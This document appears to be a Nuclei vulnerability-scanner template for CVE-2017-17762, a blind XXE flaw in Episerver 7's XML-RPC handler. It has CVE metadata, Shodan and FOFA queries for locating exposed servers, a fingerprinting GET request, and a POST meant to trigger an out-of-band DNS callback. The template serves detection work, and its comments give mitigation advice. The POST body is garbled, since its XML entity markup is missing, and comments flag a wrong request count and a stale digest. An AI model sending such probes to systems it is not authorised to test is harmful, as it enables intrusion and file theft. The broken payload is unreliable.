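# Nuclei template for CVE-2017-17762 (blind XXE in Episerver 7's XML-RPC handler).
# The source as received was collapsed onto a single line; this is the same
# content restored to conventional block-style YAML.
id: CVE-2017-17762

info:
  name: Episerver 7 - Blind XML External Entity Injection
  author: pussycat0x
  severity: high
  description: |
    Episerver 7 patch 4 and earlier contains an XML external entity (XXE) caused by processing crafted DTD in XML requests involving util/xmlrpc/Handler.ashx, letting remote attackers read arbitrary files, exploit requires sending malicious XML payloads.
  impact: |
    Remote attackers can read sensitive files from the server, leading to information disclosure.
  remediation: |
    Update to the latest version of Episerver or apply security patches that fix XXE vulnerabilities.
  reference:
    - https://gist.github.com/jonaslejon/5f92779848360a1a1e676af0795bd9aa
    - https://kryptera.se/sarbarhet-i-episerver/
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2017-17762
    cwe-id: CWE-611
    epss-score: 0.01249
    epss-percentile: 0.79646
    cpe: cpe:2.3:a:episerver:episerver:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    # NOTE(review): two raw requests are defined below (flow http(1) && http(2));
    # confirm that max-request reflects the number of requests actually sent.
    max-request: 1
    vendor: episerver
    product: episerver
    shodan-query:
      - http.html:"episerver"
      - cpe:"cpe:2.3:a:episerver:episerver"
      - http.html:"epihash"
    fofa-query:
      - body="episerver"
      - body="epihash"
  # "oast"/"oob" tags: detection depends on an out-of-band interactsh callback,
  # not on the HTTP response body.
  tags: cve,cve2017,xxe,oast,episerver,oob,vkev

# Request 2 only runs when request 1 identifies an Episerver instance.
flow: http(1) && http(2)

http:
  # Fingerprint step: the handler must answer 200 and mention EPiServer.
  # `internal: true` keeps this matcher from being reported as a finding.
  - raw:
      - |
        GET /util/xmlrpc/Handler.ashx HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "EPiServer")'
          - 'status_code == 200'
        condition: and
        internal: true

  # NOTE(review): the request body below appears to have lost its XML markup
  # during extraction (only a parameter-entity reference and the XML-RPC method
  # name survive), so this template is not usable as shown; restore the body
  # from the upstream template rather than reconstructing it by hand.
  # Defensive signal: a DNS lookup from the application server that is
  # triggered by an inbound XML-RPC POST. Mitigation is to disable DTD/external
  # entity resolution in the XML parser and restrict egress from the app tier.
  - raw:
      - |
        POST /util/xmlrpc/Handler.ashx HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/xml
        Accept: */*

        %xxe; ]> system.listMethods

    matchers:
      - type: dsl
        dsl:
          - "contains(interactsh_protocol,'dns')"
          - 'status_code == 200 || status_code == 500'
        condition: and
# NOTE(review): the digest below was computed over the upstream template bytes;
# any edit to this file (including comments) presumably invalidates it, so
# re-sign or fetch the upstream copy before use.
# digest: 4a0a0047304502202f40725eae0fe02ee1f6cd8993a4d4083aa4f8ca9917a70a187866eb267580c5022100a0a22f1abfea062eae833b7353fd36d8f2e9a15f260b1084468cbc027e66205b:922c64590222798bb761d5b6d8e72950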